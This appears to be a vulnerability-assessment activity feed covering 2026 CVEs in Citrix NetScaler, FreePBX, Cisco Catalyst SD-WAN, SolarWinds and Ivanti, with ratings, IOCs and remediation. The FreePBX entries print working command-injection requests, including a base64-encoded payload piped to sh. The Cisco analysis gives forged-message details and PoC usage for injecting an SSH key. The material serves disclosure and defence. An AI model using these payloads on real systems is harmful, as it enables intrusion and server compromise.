Activity Feed

1
Ratings
CISA KEV ListedEasy to weaponizeObserved in Botnet attackObserved in ransomware attacksObserved in state-sponsored attacksUnauthenticated
Technical Analysis

CVE-2026-3055 — Detection & Recon Analysis

1. Executive summary

Aspect Assessment
Purpose Identify NetScaler ADC/Gateway surfaces that expose SAML/WS-Federation–related HTTP endpoints and return content consistent with Citrix IdP/federation behavior.
CVE linkage Template metadata maps to CVE-2026-3055, CWE-125, Citrix bulletin CTX696300, and a CVSS 4.0 score of 9.3 per embedded classification.
What is proven Exposure and configuration class (reachable endpoints + response shape).
What is not proven Exploitability, memory disclosure size, or patch level. Detection hits are indicators, not proof of successful exploitation.

2. Technical surface under test

The template issues up to four GET requests per target (first successful match stops further paths due to stop-at-first-match: true):

Path Role
/cgi/GetAuthMethods Unauthenticated XML describing authentication methods; strong signal when <authMethods-style content is returned.
/wsfed/passive Passive WS-Federation listener; useful strings include SAML/“process Assertion” style content.
/saml/idp/metadata SAML IdP metadata (EntityDescriptor / IDPSSODescriptor).
/FederationMetadata/2007-06/FederationMetadata.xml AD FS–style federation metadata path sometimes used in similar deployments.

Redirects are limited (max-redirects: 2), which reduces drift onto unrelated pages while still allowing typical HTTPS redirects.

3. Matcher logic (Nuclei)

All of the following must hold (matchers-condition: and):

  1. HTTP 200 — Only successful responses are considered. Errors, redirects that do not end in 200 on the tested URL chain, or auth walls that return non-200 will not match.

  2. Content indicators (citrix-recon-indicators) — A word matcher on the response body with condition: or across:

    • <authMethods (GetAuthMethods),
    • process Assertion (WS-Fed/SAML processing),
    • <EntityDescriptor / IDPSSODescriptor (SAML metadata).

  3. Product fingerprint (citrix-product-fingerprint) — A DSL matcher requiring at least one of:

    • Substrings in headers (nsc_, citrix, netscaler, authenticateresponse), or
    • Substrings in body (citrix, netscaler, explicitforms).

Why the DSL layer exists: A header-only fingerprint misses deployments that return valid body content without distinctive Server/Set-Cookie strings on that specific response. Combining body keywords with the recon strings above keeps the template closer to “Citrix federation surface” than to generic pages that merely mention “Citrix.”

Extractors pull ExplicitForms or SAML from the body for reporting; they do not affect matching.

4. Strengths

  • Multi-path coverage reduces single-endpoint blind spots (e.g., metadata available when GetAuthMethods is locked down).
  • Fingerprint OR logic in the DSL layer improves recall versus the previous header-only approach.
  • References point to vendor remediation (CTX696300), supporting defensive prioritization.

5. Limitations and false signals

Risk Description
False negatives Strict 200 requirement excludes useful 401/403 cases where presence of the endpoint still matters for risk. Deployments behind WAFs or returning custom error pages may not match.
False positives Any host that returns 200 with body strings matching the patterns and generic words like citrix or netscaler could match without being a vulnerable build.
Version / patch The template does not read version strings or build numbers; patching status must be verified separately (appliance UI, show version, vendor advisory matrix).
Exploit confirmation Per vendor and research details, confirmation of the underlying issue typically requires controlled testing beyond passive GETs. The repo’s recon_poc.sh intentionally omits stress/trigger steps.

6. recon_poc.sh alignment

The script performs manual, low-impact checks aligned with the template’s first two paths:

  • Default TARGET=127.0.0.1 to steer usage toward lab environments.
  • Optional PROXY for traffic inspection (e.g., Burp) without hardcoding a third-party host.
  • Warning when the target is not localhost.
  • Explicit disclaimer that results are indicators only, not exploitability proof.

Operationally, the script is useful for validating that a lab NetScaler returns expected XML/snippet shapes before running fuller scanner workflows.

7. Defensive recommendations

  1. Patch per CTX696300 on supported versions; treat matches as priority candidates for patch verification.
  2. Reduce exposure: restrict management and federation endpoints where architecture allows; enforce TLS and monitoring on /cgi/* and federation paths.
  3. Correlate scanner findings with asset inventory and IdP configuration (SAML vs WS-Fed vs LDAP-only) before treating a hit as production-critical.

8. Document scope

This analysis describes detection logic in this repository only. It does not reproduce exploit methodology, timing thresholds, or payload sizes. For authoritative vulnerability details, rely on Citrix publications and your organization’s security advisories.


info:
  name: Citrix NetScaler ADC/Gateway - Advanced SAML IdP & Recon Detection (CVE-2026-3055)
  author: Enoson Mathivannan(https://www.linkedin.com/in/enoson-mathivannan-636985121/)
  severity: critical
  description: |
    Detects Citrix NetScaler ADC and Gateway systems configured as a SAML Identity Provider (IdP) 
    by checking for both official metadata endpoints and active reconnaissance targets identified 
    in the wild. These configurations are vulnerable to CVE-2026-3055 (CitrixBleed 3).
  remediation: |
    Apply the security updates provided by Citrix in bulletin CTX696300 immediately. 
    Systems exposing these endpoints should be prioritized for patching.
  reference:
    - https://support.citrix.com/s/article/CTX696300
    - https://x.com/watchtowrcyber/status/2037629558375993639
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
    cvss-score: 9.3
    cve-id: CVE-2026-3055
    cwe-id: CWE-125
  metadata:
    max-request: 4
    product: netscaler_adc
    vendor: citrix
  tags: cve,cve2026,citrix,netscaler,saml,memory-leak,oob-read,recon

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi/GetAuthMethods"
      - "{{BaseURL}}/wsfed/passive"
      - "{{BaseURL}}/saml/idp/metadata"
      - "{{BaseURL}}/FederationMetadata/2007-06/FederationMetadata.xml"

    stop-at-first-match: true
    max-redirects: 2
    
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        name: citrix-recon-indicators
        words:
          - "<authMethods"                   # From /cgi/GetAuthMethods
          - "process Assertion"              # From /wsfed/passive (SAML signature)
          - "<EntityDescriptor"              # From SAML Metadata
          - "IDPSSODescriptor"               # From SAML Metadata
        case-insensitive: true
        condition: or

      # Header-only fingerprints miss many gateways; allow body hints (same request).
      - type: dsl
        name: citrix-product-fingerprint
        dsl:
          - "contains(tolower(all_headers), 'nsc_') || contains(tolower(all_headers), 'citrix') || contains(tolower(all_headers), 'netscaler') || contains(tolower(all_headers), 'authenticateresponse') || contains(tolower(body), 'citrix') || contains(tolower(body), 'netscaler') || contains(tolower(body), 'explicitforms')"

    extractors:
      - type: regex
        name: exposed-endpoint
        part: body
        regex:
          - "ExplicitForms"                  # Extracted from GetAuthMethods
          - "SAML"                           # Extracted from Metadata
1
Ratings
  • Attacker Value
    High
  • Exploitability
    Medium
Common in enterpriseUnauthenticated
Technical Analysis

On March 23, 2026, Citrix published a security advisory for a critical vulnerability affecting their NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) products. This vulnerability, CVE-2026-3055, which is classified as an out-of-bounds read and holds a CVSS score of 9.3, allows unauthenticated remote attackers to leak potentially sensitive information from the appliance’s memory. The Citrix advisory states that systems configured as a SAML Identity Provider (SAML IDP) are vulnerable, whereas default configurations are unaffected.

As of the advisory’s publication, there is no known in-the-wild exploitation and no public proof-of-concept (PoC) available. According to Citrix, the vulnerability was identified internally via security review. However, exploitation of CVE-2026-3055 is likely to occur once exploit code becomes public, since the affected software is broadly exposed to the internet. Customers running affected Citrix systems should remediate this vulnerability as soon as possible; Citrix software has previously seen memory leak vulnerabilities broadly exploited in the wild, including the infamous “CitrixBleed” vulnerability, CVE-2023-4966, in 2023.

I’ve rated ‘Attacker Value’ as ‘High’ and ‘Exploitability’ as ‘Medium’. These were chosen because the affected configuration is non-default and the difficulty of leaking sensitive materials is not yet established, while also taking into consideration that the affected software is broadly exposed to the public internet and has historically been a very popular target for attackers.

1
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Common in enterpriseEasy to weaponizeVulnerable in default configurationAuthenticated
Technical Analysis

A command injection vulnerability exists in FreePBX.
User-controlled input is passed unsanitized to a shell command executed via exec(), allowing authenticated attackers to achieve remote code execution (RCE) on the FreePBX server. The vulnerability can be triggered via an AJAX endpoint in the System Recordings module and affects users with access to the recordings functionality.

Affected Products

  • Product: FreePBX
  • Module: System Recordings
  • File:
 admin/modules/recordings/Recordings.class.php
  • Function:
 function fixeRIFF($filename)

Tested Versions

  • FreePBX 17.0.24
  • FreePBX 17.0.25

Vulnerability Type

  • OS Command Injection
  • CWE-78: Improper Neutralization of Special Elements used in an OS Command
  • Leads to Remote Code Execution (RCE)

Attack Vector
Authenticated attacker with access to System Recordings module (including lower-privileged administrative users with module access).

Exploit Path

The FreePBX AJAX endpoint /admin/ajax.php exposes functionality from the System Recordings module.

Two AJAX commands are vulnerable:
[1] module=recordings&command=gethtml5
[2] module=recordings&command=convert

User-supplied POST parameters (e.g. file, filenames[]) are insufficiently sanitized and later passed into shell-executed operations via the Media handling subsystem. This allows command injection through crafted filename values..

Impact:
An attacker with access to the System Recordings module can:

  • Execute arbitrary shell commands on the FreePBX server
  • Write files to the web root
  • Potentially escalate to full system compromise

This represents an escalation from module-level access to OS-level command execution.

Proof of Concept (PoC)

Endpoint 1 — gethtml5

POST /admin/ajax.php HTTP/1.1
Host: target
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid-session>

file=dummy.wav;`touch /var/www/html/pawned`&language=en&temporary[en]=0&filenames[en]=dummy.wav&command=gethtml5&module=recordings

Result:
File /var/www/html/pawned is created on the server.

Endpoint 2 — convert

POST /admin/ajax.php HTTP/1.1
Host: target
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid-session>

file=dummy.wav;`touch /var/www/html/pawned`&name=dummy&codec=wav&lang=en&temporary=1&command=convert&module=recordings

Result:
File /var/www/html/pawned is created on the server.

Root Cause

  • Unsafe handling of user-controlled input used in file and media processing
  • Command execution paths reachable via AJAX without sufficient sanitization
  • Missing backend authorization enforcement for sensitive operations

The following code snippet shows the vulnerable code in file admin/modules/recordings/Recordings.class.php.
$filename is not sanitized and shell characters are not escaped.

        public function fixeRIFF($filename){
                exec("file -b $filename | grep 'RIFF' ", $out, $ret);
                if($ret === 0 ){
                        dbug(_("An error is occured on RIFF detection."));
                }
                if(empty($out[0])){
                        if (isset($_POST["name"]) && str_starts_with($_POST["name"], "custom/")) {
                                $f = str_replace("custom/", "", $_POST["name"]);
                        } else {
                                $f = str_replace("custom/", "", $_POST["file"]);
                        }
                        $cmd    = "mv ".$this->temp."/$f.wav $filename";
                        exec($cmd, $out, $ret);
                }
        }

Mitigation

FreePBX 16 (recordings) >= 16.0.17.2 && < 16.0.20 are vulnerable. Please upgrade to version 16.0.20.
FreePBX 17 (recordings) >= 17.0.2.4 && < 17.0.5 are vulnerable. Please upgrade to version 17.0.5.

References

CVE-2026-28287
FreePBX vulnerability disclosure

Credits

Discovery –> h00die.gr3y@gmail.com

1
Ratings
  • Attacker Value
    High
  • Exploitability
    High
Common in enterpriseEasy to weaponizeVulnerable in default configurationAuthenticated
Technical Analysis

A command injection vulnerability exists in FreePBX when using the ElevenLabs Text-to-Speech (TTS) engine. User-controlled input is passed unsanitized to a shell command executed via exec(), allowing authenticated attackers to achieve remote code execution (RCE) on the FreePBX server.
The vulnerability can be triggered via an AJAX endpoint in the System Recordings module and affects users with access to the recordings functionality.

Affected Product

  • Product: FreePBX
  • Module: System Recordings
  • Driver: ElevenLabs TTS
  • File:
 admin/modules/recordings/drivers/Elevenlabs.php
  • Function:
 convertToAudio()

Affected Versions

  • Confirmed on:
    • FreePBX 16 and 17
  • Likely affects all versions where:
    • ElevenLabs TTS driver is present
    • convertToAudio() uses exec() without argument escaping

Vulnerability Type

  • OS Command Injection
  • CWE-78: Improper Neutralization of Special Elements used in an OS Command
  • Leads to Remote Code Execution (RCE)

Attack Vector
Authenticated attacker with access to System Recordings module (including lower-privileged administrative users with module access).

Root Cause

In convertToAudio(), user-controlled input $file is concatenated directly into a shell command without escaping:

$command = "ffmpeg -y -i ".$amp_conf["ASTSPOOLDIR"]."/tmp/".$file.".MP3".
           " -acodec pcm_s16le -ac 1 -ar 44100 ".
           $amp_conf["ASTSPOOLDIR"]."/tmp/".$file.".wav 2>&1";
exec($command, $output, $returnCode);

The $file variable originates from the POST parameter file_name and is not sanitized or escaped, allowing shell meta-characters (e.g., back-ticks) to be injected and executed.

Proof of Concept (PoC)

Payload (Base64-encoded to avoid file creation errors)

echo -n "touch /var/www/html/pawned" | base64

Result:
dG91Y2ggL3Zhci93d3cvaHRtbC9wYXduZWQ=

Injected payload:

echo${IFS}dG91Y2ggL3Zhci93d3cvaHRtbC9wYXduZWQ=|base64${IFS}-d|sh

Exploit Request
[1] First get an ElevenLabs API key (can be obtained from https://elevenlabs.io/app/developers/api-keys) after registration.
[2] Set the API key with the request below.

GET /admin/ajax.php?module=recordings&command=setapikey&engine=Elevenlabs&key=sk_REDACTED HTTP/1.1
Host: <target>
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=<valid-session>

[3] Submit the exploit requests using a valid VoiceId that you can obtain from the response from the request above.

POST /admin/ajax.php?module=recordings&command=ttsConvert HTTP/1.1
Host: <target>
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid-session>

engine=Elevenlabs&file_name=;`echo${IFS}dG91Y2ggL3Zhci93d3cvaHRtbC9wYXduZWQ=|base64${IFS}-d|sh`;&text=Cuckoo&voiceId=CwhRBWXzGAHq8TQ4Fs17&langCode=en

Result:
The command executes successfully and creates the file:
/var/www/html/pawned

This confirms arbitrary command execution on the FreePBX host.

Preconditions

  • Valid FreePBX login
  • Access to System Recordings module
  • ElevenLabs API key configured (free tier sufficient)

Impact

  • Remote Code Execution as the web server user (typically asterisk or www-data)
  • Full compromise of the PBX system
  • Potential lateral movement, call interception, credential theft

Mitigation

FreePBX 16 (recordings) >= 16.0.17.2 && < 16.0.20 are vulnerable. Please upgrade to version 16.0.20.
FreePBX 17 (recordings) >= 17.0.2.4 && < 17.0.5 are vulnerable. Please upgrade to version 17.0.5.

References

CVE-2026-28209
FreePBX vulnerability disclosure

Credits

Discovery –> h00die.gr3y@gmail.com

Technical Analysis

CVE-2026-20127: Cisco Catalyst SD-WAN Authentication Bypass

Overview

On 25th February 2026, Cisco published an advisory for CVE-2026-20127, a critical authentication bypass vulnerability in the vdaemon service of Cisco Catalyst SD-WAN (formerly Viptela). The flaw allows an unauthenticated, remote attacker to subvert the DTLS peering process. By forcing a session into an “Authenticated” state, attackers gain administrative access to the Controller (vSmart) and Manager (vManage), facilitating SSH key injection and subsequent fabric manipulation via NETCONF.

CVE-2026-20127 carries a CVSSv3.1 score of 10.0 (Critical) and is associated with CWE-287: Improper Authentication. A recent investigation by Cisco Talos revealed active exploitation by the threat actor UAT-8616 dating back to 2023.

Impact

Analysis of UAT-8616’s activity confirms that CVE-2026-20127 serves as a primary entry primitive for a “Regression Chain” strategy used to achieve persistent root access:

  1. Initial Foothold: Exploit CVE-2026-20127 to inject an SSH key for the vmanage-admin user.
  2. Firmware Downgrade: Use administrative CLI privileges to force a downgrade to legacy firmware.
  3. Legacy Exploitation: Leverage known privilege escalation vulnerabilities (e.g., CVE-2022-20775) present in downgraded versions.
  4. Anti-Forensic Restoration: Re-apply modern firmware to hide the evidence of the version downgrade while maintaining an OS-level backdoor.

Analysis

Our analysis will detail the “Initial Foothold” portion of the threat actors chain. Showing how CVE-2026-20127 can be used to bypass authentication and inject an attacker controlled SSH key for the vmanage-admin user. Finally we will demonstrate how the attacker can leverage this capability to access the NETCONF service and run arbitrary NETCONF commands.

We focused our analysis on version 20.12.5 of the vdaemon service. The service manages proprietary control-plane peering over both UDP and TCP port 12346 (using DTLS and TLS, respectively). Because the authentication bypass resides in the protocol’s state machine logic rather than the transport layer, the vulnerability is reachable via either encrypted tunnel once established.

We identify the following virtual addresses as relevant functions within the compiled binaries.

Function Purpose Vulnerable (20.12.5) Patched (20.12.6.1) Symbolic Name
Primary Dispatcher 0x0013e42a 0x0013e41c vbond_proc_msg
Bypass Handler (Type 10) 0x00138ab7 0x00138ab1 vbond_proc_challenge_ack_ack
Payload Handler (Type 14) 0x001310ba 0x001310b4 vbond_proc_vmanage_to_peer

Encapsulated Packet Anatomy

This visualizes the “decapsulation” process. It shows that while the outside is a standard DTLS 1.2 packet, the inside is the proprietary vdaemon protocol where the vulnerability resides.

+-----------------------+
| UDP Header (Port)     |
+-----------------------+
| DTLS 1.2 Record       |
+-----------------------+ <--- Decryption Boundary
| vdaemon Header (12B)  |
+-----------------------+
| vdaemon Body          |
+-----------------------+

The vdaemon message wire format for a CHALLENGE_ACK_ACK message is as follows:

Byte(s) Field Value Description
0 msg_type 0x0A Message type 10 (CHALLENGE_ACK_ACK)
1 device_type 0x30 Device type 3 (vSmart), encoded as 3 << 4
2 flags 0xA0 Control Flags
3 reserved 0x00 Reserved
4-7 domain_id 0x00000001 Domain ID (Big-endian u32)
8-11 site_id 0x00000064 Site ID 100 (Big-endian u32)
12 verify_status 0x01 verify_status flag (1 = authenticated)
13 Reserved 0x00 Reserved

Note: After decryption and parsing, the vulnerable code loads this message into an internal buffer structure where verify_status is accessed at offset +0x20 relative to the p_msg pointer in memory, accounting for additional header/padding fields in the internal representation.

The Dispatcher Gate (vbond_proc_msg)

The first stage of vbond_proc_msg is a security gate. It evaluates the peer’s authentication status at offset +0x46 of the peer structure, shown as p_peer->is_authenticated below.

In the vulnerable version, the dispatcher maintained an “Allow List” that explicitly whitelisted CHALLENGE_ACK_ACK (Type 10) messages. This allowed unauthenticated peers to pass through the gate. The patch remediates this by removing the Type 10 exemption ([1]).

  if (p_peer->is_authenticated != 1) {
      /* The "Allow List": Handshake messages permitted before authentication */
      if ((msg_type != 5)  && (msg_type != 8) &&
-         (msg_type != 9)  && (msg_type != 10) && // <-- [1]
+         (msg_type != 9)  &&
          (msg_type != 0)  && (msg_type != 7)) {

          return 0x14; // Reject: Unauthorized
      }
  }

The Vulnerable Router Logic (vbond_proc_msg)

After several hundred lines of intermediate logistical processing (version negotiation, timer setup, and identity logging), the function reaches vbond_proc_msg. This switch statement is responsible for calling the final handlers.

Because the gate (above) was flawed, an unauthenticated CHALLENGE_ACK_ACK (Type 10) message could reach its handler.

// Reachable if (is_authenticated == 1) OR (msg_type is whitelisted)
switch(msg_type) {
  case 10:
	  // This handler blindly sets is_authenticated (+0x46) to 1
	  return vbond_proc_challenge_ack_ack(p_vdaemon, p_peer, p_msg);

  case 14:
	  // This administrative handler is only reachable if is_authenticated == 1
	  return vbond_proc_vmanage_to_peer(p_vdaemon, p_peer, p_msg);
}

Root Cause: State Injection (vbond_proc_challenge_ack_ack)

Because the vulnerable dispatcher allowed a CHALLENGE_ACK_ACK (Type 10) message through the gate, the packet reached the vbond_proc_challenge_ack_ack handler. This function blindly trusts a verify_status byte at offset +0x20 of the decrypted message body.

The patch remediates this by removing the assignment logic entirely ([1]). The session state can now only be transitioned to “Authenticated” by the server’s own cryptographic verification results via a CHALLENGE_ACK (Type 9) message, rather than by a status bit provided by the peer.

// p_msg + 0x20 points to the verify_status bit
  if (p_msg->verify_status != 0) {
      // VULNERABLE: Forced assignment based on remote payload
-     p_peer->is_authenticated = 1; // <-- [1]
      syslog(0xbf, "Handshake completed via ACK_ACK for peer...");
      return 0;
  }

Privilege Escalation: Authentication Flag Usage (vbond_proc_vmanage_to_peer)

The is_authenticated flag at offset +0x46 acts as the master session key. By leveraging the CHALLENGE_ACK_ACK (Type 10) bypass to force this bit to 1, an attacker “unlocks” the dispatcher, granting access to the VMANAGE_TO_PEER (Type 14) message type.

The vbond_proc_vmanage_to_peer handler then:

  1. Extracts the SSH public key from the VMANAGE_TO_PEER message body
  2. Appends it to /home/vmanage-admin/.ssh/authorized_keys
  3. Commits the change to persist the configuration

Once the SSH key is in place, the attacker can authenticate as vmanage-admin over SSH to port 830 (NETCONF service), achieving administrative control over the SD-WAN fabric.

Attack Summary

Step Benign Peering Flow Malicious Bypass (CVE-2026-20127)
1 DTLS 1.2 Handshake (Valid Cert) DTLS 1.2 Handshake (Self-Signed/Bad Cert)
2 Server sends CHALLENGE (Type 8) Server sends CHALLENGE (Type 8)
3 Peer sends CHALLENGE_ACK (Type 9) Attacker skips CHALLENGE_ACK (Type 9) / Identity Proof
4 Server verifies RSA Signature NO CRYPTO VERIFICATION PERFORMED
5 Server sends CHALLENGE_ACK_ACK (Type 10) Attacker FORGES CHALLENGE_ACK_ACK (Type 10, verify_status=1)
6 Peer confirmed as Authenticated Server blindly sets local auth flag to 1

Exploitation

Rapid7 Labs published a PoC that can leverage CVE-2026-20127 to bypass authentication, and subsequently inject an SSH key.

Usage: ./bin/vdaemon_exploit TARGET [options]

vdaemon DTLS Authentication Bypass PoC (CVE-2026-20127)

This exploit targets the vbond_proc_challenge_ack_ack() handler.
It sends a forged CHALLENGE_ACK_ACK with verify_status=1, causing
the server to set authenticated=1 without certificate verification.

    -p, --port PORT                  DTLS port (default: 12346)
        --inject-key                 Generate and inject SSH key into vmanage-admin authorized_keys
        --ssh-key PUBKEY_FILE        Path to SSH public key file to inject
        --cert CERT_FILE             Path to PEM certificate file for DTLS handshake
        --cert-key KEY_FILE          Path to PEM private key file for DTLS handshake (used with --cert)
        --data-dir DIR               Directory for generated keys/certs (default: ./data/)

Examples:
  ./bin/vdaemon_exploit 192.168.86.166
  ./bin/vdaemon_exploit 192.168.86.166 --inject-key
  ./bin/vdaemon_exploit 192.168.86.166 --ssh-key ~/.ssh/id_rsa.pub
  ./bin/vdaemon_exploit 192.168.86.166 --cert ./data/cert.pem --cert-key ./data/key.pem

Example

In the example below, the PoC is run against a target Cisco Catalyst SD-WAN Controller appliance and a access to the NETCONF service is achieved.

# Install dependencies
bundle install

# Run exploit - Test the auth bypass
ruby ./bin/vdaemon_exploit 192.168.80.10

# Run exploit - Leverage the auth bypass to inject an SSH key
ruby ./bin/vdaemon_exploit 192.168.80.10 --inject-key

# Leverage SSH key - Login to NETCONF as vmanage-admin
ssh -i /home/cryptocat/Desktop/diff/CVE-2026-20127/data/ssh/attacker_ssh_20260311_093456 vmanage-admin@192.168.80.10 -p 830

The following screenshot shows successful exploitation and subsequent SSH access to the NETCONF service:

IOCs

The following indicators are specific to the exploitation of CVE-2026-20127 and the subsequent administrative access achieved via the vdaemon protocol.

1. Control-Plane Peering Anomalies

Exploitation triggers a “Connection UP” event without the typical cryptographic identity exchange. The most distinct marker is the presence of null or uninitialized system identities.

High-Fidelity vsyslog Markers:

  • Null Identities: Peering events where peer-system-ip is recorded as :: or 0.0.0.0.
  • Unauthorized vManage/vSmart Peers: Connections from unrecognized IP addresses claiming high-privileged device roles.

Sample /var/log/vsyslog entry:

Mar  5 17:30:01 vsmart VDAEMON_0[1556]: %Viptela-vSmart-01-vdaemon_0-5-NTCE-1400002: Notification: control-connection-state-change severity-level:major host-name:"vSmart-01" system-ip:1.1.1.2 personality:vsmart peer-type:vsmart peer-system-ip::: peer-vmanage-system-ip:0.0.0.0 public-ip:192.168.80.130 public-port:38237 src-color:public-internet remote-color:(null) uptime:"0:00:00:00" new-state:up
Mar  5 17:30:13 vsmart VDAEMON_0[1556]: %Viptela-vSmart-01-vdaemon_0-2-CRIT-1400002: Notification: control-no-active-vsmart severity-level:critical host-name:"vSmart-01" system-ip:1.1.1.2 personality:vsmart
Mar  5 17:30:13 vsmart VDAEMON_0[1556]: %Viptela-vSmart-01-vdaemon_0-5-NTCE-1400002: Notification: control-connection-state-change severity-level:major host-name:"vSmart-01" system-ip:1.1.1.2 personality:vsmart peer-type:vsmart peer-system-ip::: peer-vmanage-system-ip:0.0.0.0 public-ip:192.168.80.130 public-port:38237 src-color:public-internet remote-color:(null) uptime:"0:00:00:11" new-state:down

2. Immediate Post-Bypass Authentication

As demonstrated in the PoC, the immediate objective of the bypass is to inject an SSH key to the vmanage-admin account to enable CLI access.

High-Fidelity auth.log Markers:

  • vmanage-admin SSH Access: Successful publickey authentication for the vmanage-admin user originating from the same IP address as a suspicious vdaemon peering event.
  • NETCONF Connectivity: Successful SSH sessions to TCP port 830 (NETCONF) or TCP port 22 immediately following the “Connection UP” log.

Sample /var/log/auth.log entry:

Mar  5 17:37:32 vsmart sshd[30257]: Postponed publickey for vmanage-admin from 192.168.80.130 port 54314 ssh2 [preauth]
Mar  5 17:37:32 vsmart sshd[30257]: Accepted publickey for vmanage-admin from 192.168.80.130 port 54314 ssh2: RSA SHA256:wz2FD2K+z/6dLMnB1A3uzaRN7N2SnQ4kPgQZxSN+ERo
Mar  5 17:37:32 vsmart sshd[30257]: pam_unix(sshd:session): session opened for user vmanage-admin(uid=1001) by (uid=0)

3. File Integrity: authorized_keys

The primary indicator for this specific vulnerability is the modification of the vmanage-admin SSH configuration.

  • Artifact Path: /home/vmanage-admin/.ssh/authorized_keys
  • Audit Action: Verify any new or unrecognized public keys. The PoC works by appending a key, so auditors should look for multiple keys where only one is expected.

Validation Checklist for Incident Responders

If a suspicious peering event is identified, responders should focus on the following to confirm CVE-2026-20127 exploitation:

Step Action Objective
1. Identity Audit Search logs for peer-system-ip::: Identify “Ghost” peers (0.0.0.0 or ::) bypass.
2. IP Correlation Cross-reference vsyslog and auth.log Link the exploit source IP to vmanage-admin login.
3. SSH Key Audit Inspect authorized_keys for vmanage-admin Detect unauthorized public key persistence.
4. State Audit Monitor vdaemon for Up state with null IP Confirm state-machine bypass (skipping RSA check).

Remediation

At the time of the advisory’s publication, Cisco does not recommend any workaround strategies for remediation. Organizations running affected instances of Cisco Catalyst SD-WAN Controller or Cisco Catalyst SD-WAN Manager should prioritize upgrading to a fixed version, as outlined below, to remediate CVE-2026-20127.

Cisco Catalyst SD-WAN Major Release First Fixed Release
20.18 20.18.2.1
20.16 20.18.2.1
20.15 20.15.4.2
20.14 20.15.4.2
20.13 20.15.4.2
20.12.6 20.12.6.1
20.12.5 20.12.5.3
20.11 20.12.6.1
20.9 20.9.8.2
Prior to 20.9 Migrate to a supported release

References

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
CISA KEV ListedGives privileged accessUnauthenticated
Technical Analysis

CVE-2026-20127 is a critical authentication bypass vulnerability affecting Cisco Catalyst SD‑WAN Controller and Cisco Catalyst SD‑WAN Manager that was patched on February 25, 2026. The vulnerability was originally identified and reported to Cisco by Australian Signals Directorate’s Australian Cyber Security Centre as being exploited in the wild. This vulnerability, has been added to the CISA KEV catalog

CVE-2026-20127 is an authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller and Manager systems. Exploitation allows a remote, unauthenticated attacker to submit specially crafted requests to the SD-WAN management/control plane, resulting in the creation of a trusted administrative session associated with an internal, high-privileged, non-root account.
In observed attacks documented in the Cisco SD-WAN Hunt Guide, this access was leveraged to register unauthorized (rogue) peers within the SD-WAN fabric. By inserting a malicious peer into the control plane, the attacker effectively established trusted device-level access, enabling configuration manipulation and broader control of the SD-WAN environment.

I’ve rated ‘Attacker Value’ as ‘Very High’, since Cisco is typically a huge target for threat actors, and also exploitation of this vulnerability allows access to critical infrastructure systems with elevated privileges. I’ve rated ‘Exploitability’ as ‘Moderate’, since this vulnerability has been identified as being exploited in the wild.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
CISA KEV ListedCommon in enterpriseEasy to weaponizeGives privileged accessUnauthenticatedVulnerable in default configuration
Technical Analysis

CVE-2025-40551 is one of four critical vulnerabilities affecting SolarWinds Web Help Desk that were patched on January 28, 2026. The vulnerability, which was reported to SolarWinds by Jimi Sebree of Horizon3.ai, is an unsafe deserialization bug, and it facilitates unauthenticated remote code execution on affected Web Help Desk systems. The issue is a patch bypass for a vulnerability that had two prior patch bypasses – CVE-2024-28986, a deserialization security flaw in the AjaxProxy component. This vulnerability, along with patch bypasses, have been added to the CISA KEV catalog.

CVE-2025-40551 is exploited by using a different URI path than previous exploits did, bypassing sanitization measures. That, along with the inclusion of some whitelisted terms, sidesteps defensive checks that had previously been implemented to prevent exploitation. The Horizon3.ai writeup published by the original finders demonstrated a simple JNDI lookup gadget, but weaponized exploits for Web Help Desk on Windows and Linux are now available.

I’ve rated ‘Attacker Value’ as ‘Very High’, since the software is popular, it sees exploitation in the wild, and help desk software tends to contain a lot of sensitive information. I’ve rated ‘Exploitability’ as ‘Very High’, since the bug class is a reliable one and weaponized gadget chains are available.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
CISA KEV ListedCommon in enterpriseEasy to weaponizeGives privileged accessUnauthenticatedVulnerable in default configuration
Technical Analysis

CVE-2026-1340 and CVE-2026-1281 are two very similar critical vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM) that were announced on January 29, 2026. The impact of exploitation of the vulnerabilities is unauthenticated root-level remote code execution on a sensitive mobile device endpoint management system, making these bugs valuable to attackers; an attacker that compromises EPMM would typically gain access to a wealth of PII collected from joined mobile endpoints, along with a privileged position over the devices themselves. Notably, at the time of disclosure, Ivanti advised that exploitation in the wild led to the discovery of the vulnerabilities, and CISA added an entry to the KEV catalog shortly after disclosure.

The security firm watchTowr published an excellent technical writeup that includes a proof-of-concept exploit, and a Rapid7 Metasploit module PR has been opened. I’ve rated ‘Attacker Value’ as ‘Very High’, since breaching EPMM also results in the compromise of sensitive information held by the many devices managed by it. I’ve rated ‘Exploitability’ as ‘Very High’, since the attack vector is a web API request and the bug class is a reliable one.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
CISA KEV ListedCommon in enterpriseEasy to weaponizeGives privileged accessUnauthenticatedVulnerable in default configuration
Technical Analysis

CVE-2026-1281 and CVE-2026-1340 are two very similar critical vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM) that were announced on January 29, 2026. The impact of exploitation of the vulnerabilities is unauthenticated root-level remote code execution on a sensitive mobile device endpoint management system, making these bugs valuable to attackers; an attacker that compromises EPMM would typically gain access to a wealth of PII collected from joined mobile endpoints, along with a privileged position over the devices themselves. Notably, at the time of disclosure, Ivanti advised that exploitation in the wild led to the discovery of the vulnerabilities, and CISA added an entry to the KEV catalog shortly after disclosure.

